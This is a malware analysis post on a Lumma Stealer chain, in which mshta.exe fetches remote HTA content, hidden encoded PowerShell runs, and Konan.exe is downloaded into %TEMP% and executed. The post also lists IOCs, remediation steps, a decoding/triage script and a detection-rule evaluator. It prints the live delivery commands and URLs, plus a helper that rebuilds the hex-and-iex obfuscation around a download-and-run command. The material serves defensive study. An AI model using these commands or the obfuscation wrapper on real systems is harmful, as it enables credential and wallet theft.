Lumma Stealer spreads via LOLbin - mshta.exe

By Pritam_Rakshit_ on March 13, 2026 (Last modified: March 13, 2026)

Threat Brief

The observed execution chain is a multi-stage delivery mechanism used to deploy Lumma Stealer. The infection begins with mshta.exe, which retrieves a remote payload hosted on Cloudflare R2 public-bucket infrastructure (r2.dev). That stage launches obfuscated PowerShell, which uses Base64 encoding and hexadecimal string decoding to hide the retrieval and execution of the final payload from command-line inspection.

The final payload, downloaded as Konan.exe, has been identified as Lumma Stealer, an information-stealing malware family commonly used for browser credential harvesting, cryptocurrency wallet theft, and session hijacking through stolen browser cookies.

Execution Details

Stage 1 - Initial Payload Retrieval

mshta.exe https://pub-c63c7c29d77b458bbd15fb8ef097a5a2.r2.dev/jonan.tmp

The attack starts with mshta.exe, a legitimate, Microsoft-signed Windows utility that executes HTML Application (HTA) content, including content fetched directly from a URL. Because the binary is signed and lives under System32, it passes basic application controls that allow by publisher or path, and the script never has to be written to disk as a .hta file. The .tmp extension on jonan.tmp is irrelevant: mshta.exe executes whatever scriptable content the server returns.

Stage 2 - Obfuscated PowerShell Execution

powershell.exe -w h -nop -ep un -E [Base64 Encoded Payload]

The second stage uses PowerShell with:

  • -w h → -WindowStyle Hidden (no visible console window)
  • -nop → -NoProfile (profile scripts are skipped, so nothing in them can log or interfere)
  • -ep un → -ExecutionPolicy with an abbreviated value, intended to lift script-execution restrictions. Execution policy is not a security boundary and does not apply to -Command or -EncodedCommand input, so the encoded payload runs however this value is resolved.
  • -E → -EncodedCommand; the argument is Base64 of the UTF-16LE bytes of the script, so it must be decoded as UTF-16LE, not UTF-8, to recover readable text

The decoded script carries a hexadecimal string that is converted back to characters at run time to reconstruct the next command, which is then invoked with Invoke-Expression (iex). Because the process command line only ever shows the Base64 blob, the decoded content is best recovered from PowerShell Script Block Logging (Event ID 4104), which records each script block after decoding, including the block that iex eventually runs.
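The decoding chain in stage 2 is easy to get wrong by hand (the Base64 wraps UTF-16LE, and the hex string must be found inside the decoded script). The following Python triage helper is an added example, not code from the original analysis: build_sample() wraps a command the way the stage is described (hex string, character-by-character rebuild, iex) so the decoder has something realistic to work on, and triage() takes a powershell.exe command line and returns the decoded script plus any hex-hidden commands. The wrapper template, the INNER_COMMAND stand-in and the function names are assumptions made for the example; the inner command is shaped like the page's description of stage 3 and is not the script recovered from the sample.

```python
import base64
import re

# Constructed stand-in shaped like the stage-3 command the analysis describes
# (curl-style fetch of Konan.exe into %TEMP%, then launch). It is NOT the
# script recovered from the sample.
INNER_COMMAND = (
    'curl.exe -s -o "$env:TEMP\\Konan.exe" '
    'https://pub-1c0b594021be4e21a096a2d2e4d34e24.r2.dev/Konan.exe; '
    'Start-Process "$env:TEMP\\Konan.exe"'
)

# Matches the Base64 argument of -e / -ec / -enc / -EncodedCommand (not -ep).
ENC_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
# A contiguous run of at least 16 hex byte pairs, e.g. inside a string literal.
HEX_RUN = re.compile(r"(?<![0-9A-Fa-f])(?:[0-9A-Fa-f]{2}){16,}(?![0-9A-Fa-f])")
# The comma-separated 0x.. byte-list variant of the same trick.
HEX_LIST = re.compile(r"(?:0x[0-9A-Fa-f]{2}\s*,\s*){8,}0x[0-9A-Fa-f]{2}")
IEX = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)


def build_sample(inner: str) -> str:
    """Wrap a command the way stage 2 does: store it as hex, rebuild it
    character by character, hand it to Invoke-Expression, then Base64-encode
    the UTF-16LE bytes for -EncodedCommand. The wrapper text is an assumed
    shape for illustration, not the sample's own wrapper."""
    hex_blob = inner.encode("utf-8").hex()
    wrapper = (
        f"$h='{hex_blob}';"
        "$s=-join(($h -split '(..)'|?{$_})|%{[char][Convert]::ToInt32($_,16)});"
        "iex $s"
    )
    return base64.b64encode(wrapper.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries UTF-16LE text; decoding it as UTF-8 leaves
    interleaved NUL bytes and defeats naive string matching."""
    return base64.b64decode(b64).decode("utf-16-le")


def recover_hex_strings(script: str) -> list[str]:
    """Return every long hex string in the script decoded back to text."""
    found = []
    for m in HEX_RUN.finditer(script):
        found.append(bytes.fromhex(m.group(0)).decode("utf-8", errors="replace"))
    for m in HEX_LIST.finditer(script):
        pairs = re.findall(r"0x([0-9A-Fa-f]{2})", m.group(0))
        found.append(bytes.fromhex("".join(pairs)).decode("utf-8", errors="replace"))
    return found


def triage(cmdline: str) -> dict:
    """Decode one powershell.exe command line and surface what it hides."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return {"encoded": False}
    script = decode_encoded_command(m.group(1))
    return {
        "encoded": True,
        "script": script,
        "uses_iex": IEX.search(script) is not None,
        "recovered": recover_hex_strings(script),
    }


if __name__ == "__main__":
    blob = build_sample(INNER_COMMAND)
    result = triage(f"powershell.exe -w h -nop -ep un -E {blob}")
    print("decoded script:", result["script"])
    for cmd in result["recovered"]:
        print("hex-hidden command:", cmd)
```

Feed triage() the CommandLine field of a Sysmon Event ID 1 or Security 4688 record; when script block logging is not enabled, this is the quickest way to see what the hidden window actually ran.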

Stage 3 - Final Payload Download

powershell -iex(https://pub-1c0b594021be4e21a096a2d2e4d34e24.r2.dev/Konan.exe)

The line above is shorthand for the decoded stage, not its literal syntax. The decoded script fetches Konan.exe from the second R2 bucket using curl-style retrieval, writes it into the user's temporary directory (%TEMP%), and launches it immediately. Two delivery hosts are therefore contacted before the stealer runs: the first bucket serves the script content for mshta.exe, the second serves the executable.

Stage 4 - Malware Execution

File executed: Konan.exe

SHA256: c4122532331cd5f1f5c11727a853b9061ef2c4ceb0889914282e7dfd62542204

IOCs

File Hash

c4122532331cd5f1f5c11727a853b9061ef2c4ceb0889914282e7dfd62542204

Domains

  • toptalentw.top
  • tropiscbs.live
  • woodpeckersd.run
  • zootechq.run
  • geographys.run
  • biosphxere.digital
  • buzzarddf.live
  • parakehjet.run
  • bearjk.live

Cloudflare R2 Delivery Hosts (full URLs in Stage 1 and Stage 3)

  • pub-c63c7c29d77b458bbd15fb8ef097a5a2.r2.dev
  • pub-1c0b594021be4e21a096a2d2e4d34e24.r2.dev

Remediation

  • Block execution of mshta.exe where not required, for example with an AppLocker or WDAC deny rule covering both %SystemRoot%\System32\mshta.exe and %SystemRoot%\SysWOW64\mshta.exe, with explicit exceptions for any business HTA that still depends on it.
  • Alert on powershell.exe launched with a hidden window together with an encoded command (-w h / -WindowStyle Hidden with -e / -enc / -EncodedCommand), and on powershell.exe whose parent process is mshta.exe.
  • Block outbound traffic to the two R2 bucket hostnames listed above. Blocking all of r2.dev also works but breaks legitimate software that fetches from Cloudflare R2 public buckets, and a new bucket costs the attacker almost nothing, so pair the block with the behavioural detections.
  • Isolate infected systems immediately if Konan.exe execution is detected. Treat the filename as weak evidence; the SHA256 and the parent-process chain (mshta.exe → powershell.exe → executable launched from %TEMP%) are the stronger indicators.
  • Reset credentials saved in browsers on the affected host and invalidate active sessions; stolen session cookies remain valid after a password reset until the sessions themselves are revoked.
  • Deploy IOC-based detection for the listed domains, R2 hosts and SHA256 hash.
  • Enable PowerShell Script Block Logging (Event ID 4104) so the decoded script and the hex-reconstructed command are captured, and build EDR detections on Invoke-Expression combined with hex-decoding patterns such as [Convert]::ToInt32(..., 16) feeding [char].
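The monitoring points above, run over process-creation telemetry, as an added example that is not part of the original brief. The Python below evaluates a constructed set of Sysmon-style records (ParentImage|Image|CommandLine|SHA256, made up for this example) against behavioural rules for each stage (mshta.exe with a URL, hidden plus encoded PowerShell, PowerShell spawned by mshta.exe, PowerShell launching a binary from %TEMP%) and against the atomic indicators listed in the IOC section. The record format, rule names and the placeholder encoded blob are assumptions; the indicators are the ones on this page.

```python
import base64
import re

# Indicators from the IOC section above.
R2_HOSTS = {
    "pub-c63c7c29d77b458bbd15fb8ef097a5a2.r2.dev",
    "pub-1c0b594021be4e21a096a2d2e4d34e24.r2.dev",
}
C2_DOMAINS = {
    "toptalentw.top", "tropiscbs.live", "woodpeckersd.run", "zootechq.run",
    "geographys.run", "biosphxere.digital", "buzzarddf.live", "parakehjet.run",
    "bearjk.live",
}
KONAN_SHA256 = "c4122532331cd5f1f5c11727a853b9061ef2c4ceb0889914282e7dfd62542204"

REMOTE_URL = re.compile(r"https?://", re.I)
# -w h, -win hidden, -WindowStyle Hidden: powershell.exe accepts prefixes.
HIDDEN = re.compile(r"-w(?:in(?:dowstyle)?)?\s+h(?:id(?:den)?)?\b", re.I)
# -e, -ec, -enc, -EncodedCommand followed by a Base64 blob; -ep does not match.
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)

# Constructed placeholder for an encoded argument (not the real stage-2 blob).
ENC_BLOB = base64.b64encode("Write-Host constructed".encode("utf-16-le")).decode("ascii")

# Constructed process-creation records: ParentImage|Image|CommandLine|SHA256.
SAMPLE_EVENTS = [
    r"C:\Windows\explorer.exe|C:\Windows\System32\mshta.exe"
    r"|mshta.exe https://pub-c63c7c29d77b458bbd15fb8ef097a5a2.r2.dev/jonan.tmp|",
    r"C:\Windows\System32\mshta.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|powershell.exe -w h -nop -ep un -E " + ENC_BLOB + "|",
    r"C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1|",
    r"C:\Windows\System32\svchost.exe|C:\Windows\System32\mshta.exe"
    r"|mshta.exe C:\ProgramData\Vendor\setup.hta|",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Users\u\AppData\Local\Temp\Konan.exe"
    r"|C:\Users\u\AppData\Local\Temp\Konan.exe|" + KONAN_SHA256,
]


def parse(line: str) -> dict:
    parent, image, cmd, sha = line.split("|", 3)
    return {"ParentImage": parent, "Image": image, "CommandLine": cmd, "SHA256": sha}


def evaluate(ev: dict) -> list[str]:
    """Return the names of the rules an event triggers, behavioural first."""
    hits = []
    image = ev["Image"].lower()
    parent = ev["ParentImage"].lower()
    cmd = ev["CommandLine"]
    low = cmd.lower()

    # Stage 1: mshta.exe pulling content from a URL rather than a local file.
    if image.endswith("\\mshta.exe") and REMOTE_URL.search(cmd):
        hits.append("mshta_remote_content")

    # Stage 2: hidden, encoded PowerShell, and PowerShell spawned by mshta.exe.
    if image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        if HIDDEN.search(cmd) and ENCODED.search(cmd):
            hits.append("powershell_hidden_encoded")
        if parent.endswith("\\mshta.exe"):
            hits.append("mshta_spawned_powershell")

    # Stage 3/4: PowerShell launching a binary that was dropped in %TEMP%.
    if "\\temp\\" in image and parent.endswith(("\\powershell.exe", "\\pwsh.exe")):
        hits.append("powershell_launched_temp_binary")

    # Atomic indicators from the report.
    if any(h in low for h in R2_HOSTS):
        hits.append("ioc_r2_delivery_host")
    if any(d in low for d in C2_DOMAINS):
        hits.append("ioc_c2_domain")
    if ev["SHA256"].lower() == KONAN_SHA256:
        hits.append("ioc_konan_sha256")
    return hits


def scan(lines: list[str]) -> list[tuple[int, list[str]]]:
    """Evaluate every record; return (index, hits) for those that fire."""
    findings = []
    for idx, line in enumerate(lines):
        hits = evaluate(parse(line))
        if hits:
            findings.append((idx, hits))
    return findings


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

The benign records (a signed script run with -File, a local HTA launched by a service) produce no hits, while each malicious stage fires at least one behavioural rule even where the attacker rotates the bucket, domain or filename; the atomic indicators add confidence rather than carrying the detection.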